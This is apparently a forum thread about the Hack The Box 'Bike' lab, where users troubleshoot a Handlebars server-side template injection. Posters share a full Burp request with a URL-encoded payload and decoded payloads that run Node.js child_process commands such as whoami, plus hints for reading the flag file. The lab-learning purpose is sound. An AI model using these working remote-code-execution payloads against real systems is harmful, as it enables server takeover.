Starting Point: Bike

This box isn’t working the way it should according to the walkthrough. In burp repeater I execute:

POST / HTTP/1.1

Host: 10.129.12.226

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 1334

Origin: http://10.129.12.226

Connection: close

Referer: http://10.129.12.226/

Upgrade-Insecure-Requests: 1



email=%7b%7b%23%77%69%74%68%20%22%73%22%20%61%73%20%7c%73%74%72%69%6e%67%7c%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%22%65%22%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%73%70%6c%69%74%20%61%73%20%7c%63%6f%6e%73%6c%69%73%74%7c%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%28%6c%6f%6f%6b%75%70%20%73%74%72%69%6e%67%2e%73%75%62%20%22%63%6f%6e%73%74%72%75%63%74%6f%72%22%29%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%73%74%72%69%6e%67%2e%73%70%6c%69%74%20%61%73%20%7c%63%6f%64%65%6c%69%73%74%7c%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%22%72%65%74%75%72%6e%0a%70%72%6f%63%65%73%73%2e%6d%61%69%6e%4d%6f%64%75%6c%65%2e%72%65%71%75%69%72%65%28%27%63%68%69%6c%64%5f%70%72%6f%63%65%73%73%27%29%2e%65%78%65%63%53%79%6e%63%28%27%77%68%6f%61%6d%69%27%29%3b%22%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%23%65%61%63%68%20%63%6f%6e%73%6c%69%73%74%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%28%73%74%72%69%6e%67%2e%73%75%62%2e%61%70%70%6c%79%20%30%20%63%6f%64%65%6c%69%73%74%29%7d%7d%0a%20%7b%7b%74%68%69%73%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%7b%7b%2f%65%61%63%68%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%7b%7b%2f%77%69%74%68%7d%7d&action=Submit

I get back this:

HTTP/1.1 200 OK

X-Powered-By: Express

Content-Type: text/html; charset=utf-8

Content-Length: 1172

ETag: W/"494-RpawBI+3kN5Kwt8S54wY32132DQ"

Date: Wed, 18 May 2022 15:21:07 GMT

Connection: close



<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <link rel="stylesheet" href="css/home.css">
    <title> Bike </title>
</head>
<header>

</header>

<body>
    <div id=container>
  <img
    src="images/buttons.gif"
    id="avatar">
  <div class="type-wrap">
    <span id="typed" style="white-space:pre;" class="typed"></span>
  </div>
</div>
<div id="contact">
    <h3>We can let you know once we are up and running.</h3>
    <div class="fields">
      <form id="form" method="POST" action="/">
        <input name="email" placeholder="E-mail"></input>
        <button type="submit" class="button-54" name="action" value="Submit">Submit</button>
      </form>
    </div>
    <p class="result">
        We will contact you at:  e
 2
 [object Object]
 function Function() { [native code] }
 2
 [object Object]

    </p>
</div>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script src="js/typed.min.js"></script>
    <script src="js/main.js"></script>
</body>

</html>

According to the walkthrough I should get this:

Screenshot 2022-05-18 1625031274×567 52.5 KB

I found out that it’s possible to follow this walkthrough all the way through if you use the pwnbox, but not if you’re using Kali-Linux-2022.2-virtualbox-amd64. Does anyone know why this is? What’s the vital difference?

@mercadier I am running into the exact same issue. I’m using Ubuntu 22.04 LTS. Have you found a solution or you still waiting for a solution?

I was having the same problem. I got around it by encoding the code block:

{{#with “s” as |string|}}
{{#with “e”}}
{{#with split as |conslist|}}
{{this.pop}}
{{this.push (lookup string.sub “constructor”)}}
{{this.pop}}
{{#with string.split as |codelist|}}
{{this.pop}}
{{this.push “return process.mainModule;”}}
{{this.pop}}
{{#each conslist}}
{{#with (string.sub.apply 0 codelist)}}
{{this}}
{{/with}}
{{/each}}
{{/with}}
{{/with}}
{{/with}}
{{/with}}

Then instead of copying the next code blocks, just append the additional code onto the end of mainModule. You should be able to get the flag this way.

I think machine does not work. I’ve got “The connection was reset” in pwnbox when entering magic {{7*7}}.

Hello there, I am having the exact same issue described by @SampleService

I am using a fresh install of Kali 2022.2 as guest on Vbox, but I’ve got the same issue even with a Debian as host.

I’m having something similar. When I’m entering {{7*7}}, the error page is not loading. So I don’t see the server-side error code. I only get the firefox error page that the site could not be loaded. “Firefox can’t establish a connection to the server at 10.129.196.1.”

• I’m connected via OpenVPN.
• Kali Linux 2022.2

Exact same issue here, please file a case to customer service like i did. I believe in case they 'll receive massive load of such queries this might speed up the process for this machine.

I’m running into exact same issue.
I send {{7*7}}, received “The connection was reset”.

The machine is now working properly, just solved without any problems!

This worked for me… thanks

If you are not getting the output “root” add the method toString()

{{#with "s" as |string|}}
 {{#with "e"}}
 {{#with split as |conslist|}}
 {{this.pop}}
 {{this.push (lookup string.sub "constructor")}}
 {{this.pop}}
 {{#with string.split as |codelist|}}
 {{this.pop}}
 {{this.push "return process.mainModule.require('child_process').execSync('whoami').toString();"}}
 {{this.pop}}
 {{#each conslist}}
 {{#with (string.sub.apply 0 codelist)}}
 {{this}}
 {{/with}}
 {{/each}}
 {{/with}}
 {{/with}}
 {{/with}}
{{/with}}

I tried to apply the encoded payload directly to the email box. Didn’t get the same result as with using Burp. Got that “We will contact you at: %7b%7b%23%77%69%74%68%20%22%73%22%20%6…”.
Has anyone tried that and/or can explain the difference between how the string that is applied directly is different from the one sent through Burp Repeater?

Once I change the return process line to "{{this.push “return process.mainModule.require(‘child_process’).execSync(‘whoami’);”}}, it gives me output but does not indicate “root” in the return.

Then all other node.js codes that follow only provide me syntax errors. I’ve tried copying, typing, running this on the HTB desktop, running the lab on a VPN through ParrotSec, and I get stuck at this point every time.

It worked for me, thank you so much!

There is text formatting error if you follow along in the writeup and copy and paste into burp. There is an extra line. Anything that is below the this.push "return line should be moved and add to it.

{{this.push “return
process.mainModule.require(‘child_process’).execSync(‘whoami’);”}}

Should look like

{{this.push “return process.mainModule.require(‘child_process’).execSync(‘whoami’);”}}

This fixed it for me. Thanks technonerd!

okay, when you ls/root ls space /root will work
then next one you have to do cat space/root/flag.txt